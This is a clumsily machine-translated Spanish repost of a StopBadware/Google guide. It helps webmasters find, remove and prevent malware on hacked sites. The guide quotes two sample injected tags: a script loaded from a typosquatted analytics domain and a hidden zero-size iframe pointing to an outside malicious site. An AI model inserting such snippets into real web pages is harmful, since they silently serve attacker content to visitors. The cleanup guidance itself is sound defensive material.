A continuación adjunto un tutorial (por google) orientado a los WebMaster que al momento de ingresar a su web se encuentran con el siguiente msj.
Firefox:
Chrome:
¿Por qué pasa?
1) El sitio se ha interceptado.
2) El sitio no supervisa el contenido que puedan aportar usuarios malintencionados.
3) El sitio muestra contenido de una red de anuncios con un anunciante malintencionado.
Consejos para la Limpieza y Seguridad del sitio web
Esta página ofrece información sobre la identificación, eliminación y prevención de software maligno en su sitio web. No cubre todas las situaciones, sólo los casos más comunes que vemos en StopBadware. Algunos casos pueden requerir una mayor asistencia de un profesional de la seguridad. También puede encontrar información adicional y ayuda voluntaria en .
Ofrecemos este consejo tal como es y no puede garantizar los resultados de los que lo siguen. Al igual que usted, lo hacemos lo mejor que podemos.
Hay tres pasos básicos para la restauración y el mantenimiento de un sitio web limpio:
1.Identificar el comportamiento de software maligno
2.La eliminación de la conducta badware
3.Prevenir la infección por el futuro
Identificar el comportamiento de software maligno
El primer paso para mantener su sitio web libre de software maligno es para comprobar si hay comportamientos badware o software maligno que puede estar ya en su sitio.
Lo que debe buscar
Las tres formas más comunes de software maligno que StopBadware ve en sitios comprometidos son:
1.Scripts maliciosos
2.Htaccess. Redirecciones
3.Iframes ocultos
Scripts maliciosos
Scripts maliciosos a menudo se utiliza para redirigir a los visitantes del sitio a un sitio web diferente y / o software maligno de carga de otra fuente. Estas secuencias de comandos a menudo se inyecta por un atacante en el contenido de sus páginas web, o, a veces en otros archivos en el servidor, tales como imágenes y archivos PDF. A veces, en lugar de la inyección de todo el guión en sus páginas web, el atacante sólo le inyectará un puntero a un js. U otro archivo que el atacante guarda en un directorio en su servidor web.
Muchos scripts maliciosos utilizar la ofuscación para que sean más difíciles para los escáneres anti-virus para detectar:
Algunas secuencias de comandos malintencionadas utilizar nombres que parecen que vienen de sitios legítimos (tenga en cuenta la falta de ortografía de "análisis":
<script src='http://google-anaiytics.com/urchin.js'></script>
Htaccess. Redirecciones
El servidor web Apache, que es utilizado por muchos proveedores de hosting, utiliza un servidor de archivos oculto llamado. Htaccess para configurar ciertas opciones de acceso para los directorios en el sitio web. Los atacantes a veces va a modificar un archivo existente. Htaccess en su servidor web o subir archivos htaccess nuevo. A su servidor web con instrucciones para redirigir a los usuarios a otros sitios web, a menudo los que llevan a la descarga de software maligno o de las ventas fraudulentas de productos.
Iframes ocultos
Un iframe es una sección de una página web que se carga el contenido de otra página o sitio. Los atacantes lo general se inyectan iFrames maliciosos en una página web u otro archivo en su servidor. A menudo, estos iframes será configurado para que no aparezcan en la página web cuando alguien visita la página, pero el contenido malicioso que se carga se carga todavía, oculto a la vista del visitante.
<script src='http://youneedsex.info/in.php" width=0 height=0 frameborder=0>
¿Cómo buscar que
Si su sitio fue reportado como un sitio de software maligno por Google, se puede utilizar de Google Webmaster Tools google.com/webmasters/tools
para obtener más información acerca de lo que se ha detectado. Esto incluye una muestra de las páginas en las que se ha detectado el software maligno y, utilizando una función de Labs, posiblemente incluso una muestra del código malicioso que se encontró en su sitio. Cierta información también se puede encontrar en la página de Google Diagnóstico, que se puede encontrar mediante la sustitución de example.com en la siguiente URL en su propio sitio URL : www.google.com/safebrowsing/diagnostic?site=example.com
Existen varios servicios web gratuitos y de pago de exploración en Internet que pueden ayudarle a cero en el software maligno específico en su sitio. También existen herramientas que puede utilizar en su servidor web y / o en una copia descargada de los archivos de su sitio web para buscar un texto específico. StopBadware no enumera o recomendar estos servicios, pero los voluntarios en nuestra comunidad en línea estará encantado de punto a sus favoritos.
La eliminación de la conducta badware
Una vez que haya localizado el código que está causando el comportamiento de software maligno, la eliminación es a menudo tan simple como borrar el código erróneo de todos los archivos en los que aparece. A veces, es más fácil, si usted tiene una copia de seguridad limpia de los contenidos de su sitio, volver a cargar todos los archivos del sitio, aunque tenga cuidado acerca de sobrescribir los archivos que pueden haber cambiado desde la última copia de seguridad. En algunos casos, el contenido mal puede ser almacenada en uno o más registros de base de datos, en cuyo caso la restauración de una copia de seguridad reciente de la base de datos o editar manualmente los registros pueden ser necesarios.
Prevenir la infección por el futuro
La prevención de software maligno en su sitio web requiere la protección de tres cosas: su propio sitio web, la contraseña (s) que se utiliza para cargar contenido en el sitio, y el equipo utilizado (s) para cargar contenido en el sitio. El sitio en sí debe ser protegido ya que los atacantes buscan a menudo el software vulnerable a la explotación para que puedan modificar el contenido de su sitio. Las contraseñas son muy importantes porque, si se adivinan o robado, se pueden utilizar para modificar el sitio. Finalmente, las computadoras son importantes debido a software maligno en su computadora puede robar tu contraseña y / o modificar el contenido que está cargando.
Proteja su sitio
•Asegúrese de que cualquier software que utilice (por ejemplo, software para blogs como WordPress, scripts de terceros, etc) se mantiene al día con los últimos parches de seguridad, ya sea por usted (si ha instalado el software) o por su proveedor de hosting.
•Eliminar las secuencias de comandos, servicios, u otro software que ya no utilice.
•Cambiar las contraseñas por defecto que vienen con el software que está utilizando.
•Utilizar los permisos apropiados de archivo en su servidor web.
Proteja su contraseña
•Utilice una contraseña segura y cambiarla de vez en cuando, especialmente si usted tiene razón para pensar que se ha visto comprometida.
•Consejos para elegir y la protección de una contraseña segura se puede encontrar en esta página ayuda
Proteja su computadora
•Vea nuestra guía para la prevención de software maligno en el ordenador